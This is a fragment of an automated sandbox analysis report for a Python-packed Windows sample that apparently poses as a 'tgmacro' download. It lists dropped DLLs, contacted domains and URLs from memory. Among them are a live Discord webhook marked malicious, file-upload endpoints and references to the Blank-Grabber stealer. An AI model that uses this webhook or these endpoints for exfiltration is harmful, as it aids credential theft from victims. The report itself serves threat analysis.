              C:\Users\user\AppData\Local\Temp\_MEI75162\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\python313.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              jsdelivr.map.fastly.net
              151.101.193.229
              truefalse
                um.simpli.fi
                35.204.158.49
                truefalse
                  discord.com
                  162.159.128.233
                  truetrue
                    tagr-pixel-nginx-odr-euw4.mookie1.com
                    34.160.236.64
                    truefalse
                      am1-direct-bgp.contextweb.com
                      208.93.169.131
                      truefalse
                        dsp.adkernel.com
                        174.137.133.49
                        truefalse
                          stats.g.doubleclick.net
                          64.233.167.156
                          truefalse
                            code.jquery.com
                            151.101.66.137
                            truetrue
                              widget.nl3.vip.prod.criteo.com
                              178.250.1.9
                              truefalse
                                cm.g.doubleclick.net
                                142.250.185.194
                                truefalse
                                  ds-pr-bh.ybp.gysm.yahoodns.net
                                  52.16.92.15
                                  truefalse
                                    www.google.com
                                    142.250.185.228
                                    truefalse
                                      ip-api.com
                                      208.95.112.1
                                      truefalse
                                        sync.srv.stackadapt.com
                                        54.88.211.52
                                        truefalse
                                          trksyln.net
                                          160.153.155.187
                                          truetrue
                                            match.adsrvr.org
                                            35.71.131.137
                                            truefalse
                                              match.prod.bidr.io
                                              54.170.20.205
                                              truefalse
                                                sync2-dsp.e-volution.ai
                                                8.2.111.136
                                                truefalse
                                                  sync.ipredictive.com
                                                  107.21.226.44
                                                  truefalse
                                                    ep1.adtrafficquality.google
                                                    216.58.206.34
                                                    truefalse
                                                      s.uuidksinc.net
                                                      185.98.54.153
                                                      truefalse
                                                        gw-c-eu-isp.temu.com
                                                        20.157.217.118
                                                        truefalse
                                                          ep2.adtrafficquality.google
                                                          216.58.206.65
                                                          truefalse
                                                            gtrace.mediago.io
                                                            35.214.168.80
                                                            truefalse
                                                              analytics-alv.google.com
                                                              216.239.34.181
                                                              truefalse
                                                                googleads.g.doubleclick.net
                                                                142.250.184.226
                                                                truefalse
                                                                  www3.l.google.com
                                                                  142.250.185.142
                                                                  truefalse
                                                                    ads.travelaudience.com
                                                                    35.190.0.66
                                                                    truefalse
                                                                      onetag-sys.com
                                                                      51.89.9.252
                                                                      truefalse
                                                                        td.doubleclick.net
                                                                        172.217.18.2
                                                                        truefalse
                                                                          upload.wikimedia.org
                                                                          185.15.59.240
                                                                          truefalse
                                                                            widget.us5.vip.prod.criteo.com
                                                                            74.119.117.16
                                                                            truefalse
                                                                              ka-f.fontawesome.com
                                                                              unknown
                                                                              unknownfalse
                                                                                cdn.jsdelivr.net
                                                                                unknown
                                                                                unknownfalse
                                                                                  fundingchoicesmessages.google.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    a.c.appier.net
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      www.temu.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        dis.criteo.com
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          a.fsdn.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            widget.us.criteo.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              pr-bh.ybp.yahoo.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                odr.mookie1.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  kit.fontawesome.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    px.ads.linkedin.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      www.trksyln.net
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        bh.contextweb.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          analytics.google.com
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            dclk-match.dotomi.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                                              https://trksyln.net/tgmacro/downloadfalse
                                                                                                                https://discord.com/api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3PJiYs412SWGodn3lagwGj7true
                                                                                                                  https://trksyln.net/favicon.icofalse
                                                                                                                    https://trksyln.net/resources/css/site.cssfalse
                                                                                                                      https://sync.srv.stackadapt.com/sync?nid=154&google_gid=CAESEHWbVka7PFDHpdWk2787PTM&google_cver=1&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdwfalse
                                                                                                                        https://fundingchoicesmessages.google.com/f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQfalse
                                                                                                                          https://fundingchoicesmessages.google.com/i/ca-pub-9495854422341365?href=https%3A%2F%2Ftrksyln.net%2FError&ers=2false
                                                                                                                            http://www.trksyln.net/tgmacro/downloadfalse
                                                                                                                              https://sync2-dsp.e-volution.ai/sync?id=10&google_gid=CAESELZvmPR7DxJls1q5vUVneqI&google_cver=1&google_push=AXcoOmTOEF9Y8fogjEB4TqPOvFToDFSNcqrrOe7PA0KGyHSr7lsEvHJLWXoidRqi6SOq-7TG1-HqyFGdK2rWPeFjmNw3z3TgjDyQdgfalse
                                                                                                                                https://odr.mookie1.com/t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1false
                                                                                                                                  https://ep1.adtrafficquality.google/getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=envfalse
                                                                                                                                    https://pr-bh.ybp.yahoo.com/sync/adx?google_gid=CAESEEmQdMAM7E0W-DH6rhDiIxs&google_cver=1&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0false
                                                                                                                                      https://match.adsrvr.org/track/cmf/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3Efalse
                                                                                                                                        https://ep2.adtrafficquality.google/sodar/sodar2.jsfalse
                                                                                                                                          https://www.temu.com/api/adx/cm/pixel?google_gid=CAESEPW3MUN8tvNLNoJsiPIpkO8&google_cver=1&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1Ofalse
                                                                                                                                            https://match.prod.bidr.io/cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zoffalse
                                                                                                                                              https://fundingchoicesmessages.google.com/f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_false
                                                                                                                                                https://www.temu.com/api/adx/cm/pixel?google_gid=CAESENYT61gwLXGsOhmLZBLf7tE&google_cver=1&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Qfalse
                                                                                                                                                  https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.cssfalse
                                                                                                                                                    https://www.google.com/pagead/drt/uifalse
                                                                                                                                                      https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.jsfalse
                                                                                                                                                        https://www.google.com/ads/measurement/l?ebcid=ALh7CaQdsNBo9WRTFG5NvmpTSV1NED_cHunzkusyqhhJ8wsHTvFR9ycGSGsL-T38B7ZwdJYBS7dgA391Exs0qr0ZBQUJ4_OAxgfalse
                                                                                                                                                          https://gtrace.mediago.io/ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9gfalse
                                                                                                                                                            https://fundingchoicesmessages.google.com/i/pub-9495854422341365?ers=1false
                                                                                                                                                              https://sync.ipredictive.com/d/sync/cookie/generic?https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=${ADELPHIC_CUID_B64}false
                                                                                                                                                                https://trksyln.net/resources/css/navbar.cssfalse
                                                                                                                                                                  https://match.prod.bidr.io/cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&_bee_ppp=1false
                                                                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                    https://duckduckgo.com/chrome_newtabEl9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://github.com/Blank-c/BlankOBFEl9HaBFrFM.exe, 00000001.00000003.1699429715.0000025068641000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1702409710.0000025068313000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1701153171.000002506830E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://duckduckgo.com/ac/?q=El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://crl.microsoftpowershell.exe, 0000002E.00000002.1945615374.0000026CB6334000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#El9HaBFrFM.exe, 00000001.00000002.2245395851.00000250660C7000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1693415514.0000025067C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://www.leboncoin.fr/El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-fileEl9HaBFrFM.exe, 00000001.00000003.1894005943.0000025068450000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249686549.0000025068450000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711381621.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://trksyln.net/Download/thankyouEl9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                                                                                                                    https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64El9HaBFrFM.exe, 00000001.00000003.1707245032.0000025067E9F000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000003D.00000003.1851285401.000001C1A8536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://api.anonfiles.com/uploadEl9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://www.msn.comEl9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E04000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254155732.00000250698AC000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1957704599.0000021ED7999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB98F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2087591668.0000026CC8143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://discord.com/api/v9/users/El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963El9HaBFrFM.exe, 00000001.00000002.2250811628.0000025068640000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.000002506853A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1890826946.0000021EC7921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB7F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000003D.00000003.1851285401.000001C1A85A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameEl9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyEl9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://www.trksyln.net/tgmacro/downloadlbound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerEl9HaBFrFM.exe, 00000001.00000002.2245395851.00000250660C7000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249113560.0000025067C00000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1693415514.0000025067C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://github.com/python/cpython/issues/86361.El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://www.microsoft.coEupowershell.exe, 00000006.00000002.1984874757.0000021EDFF70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://contoso.com/Iconpowershell.exe, 0000002E.00000002.2087591668.0000026CC8010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://httpbin.org/El9HaBFrFM.exe, 00000001.00000003.1711133484.00000250684F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://crl.ver)svchost.exe, 0000003D.00000002.2950366204.000001C1A8600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sEl9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleEl9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesEl9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://www.ecosia.org/newtab/El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://www.youtube.com/El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.gEl9HaBFrFM.exe, 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.2243097224.00000250685B7000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C24000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            http://trksyln.net/tgmacro/data/VersionInfo.jsondhttp://trksyln.net/tgmacro/data/ShadyWebSites.jsonEl9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                                                                                                                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://MD8.mozilla.org/1/mEl9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E08000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254155732.0000025069870000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  https://www.bbc.co.uk/El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://bugzilla.moEl9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068B10000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AC4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      http://tools.ietf.org/html/rfc6125#section-6.4.3El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        https://trksyln.net/tgmacro/HowToUse/MainMenuahttp://trksyln.net/tgmacro/data/VersionInfo.jsonehttp:El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                                                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1890826946.0000021EC7B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            http://www.trksyln.net/tgmacro/downloadubound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              https://google.com/mailEl9HaBFrFM.exe, 00000001.00000002.2249686549.000002506839D000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.00000250684F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesEl9HaBFrFM.exe, 00000001.00000003.2241890950.0000025068FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  https://www.iqiyi.com/El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.El9HaBFrFM.exe, 00000001.00000002.2249686549.0000025068240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      http://ocsp.sectigo.com0El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        https://tools.ietf.org/html/rfc7231#section-4.3.6)El9HaBFrFM.exe, 00000001.00000002.2249686549.0000025068240000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249686549.000002506842B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          https://discordapp.com/api/v9/users/El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specEl9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              https://github.com/urllib3/urllib3/issues/2920El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.00000250684F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataEl9HaBFrFM.exe, 00000001.00000002.2245395851.00000250660C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  https://account.bellmedia.cEl9HaBFrFM.exe, 00000001.00000002.2254155732.00000250698B4000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E04000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    https://login.microsoftonline.comEl9HaBFrFM.exe, 00000001.00000003.1783485921.0000025068C0D000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254155732.000002506988C000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E04000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AC4000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      http://cacerts.digijEl9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          https://www.zhihu.com/El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                            http://www.trksyln.netYhttps://trksyln.net/tgmacro/HowToUse/Actionsahttps://trksyln.net/tgmacro/HowTEl9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                                                                                                                                                                                                                              https://api.gofile.io/getServerEl9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngEl9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C24000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoEl9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                      https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngzEl9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                        https://api.anonfiles.com/uploadr#El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpfalse
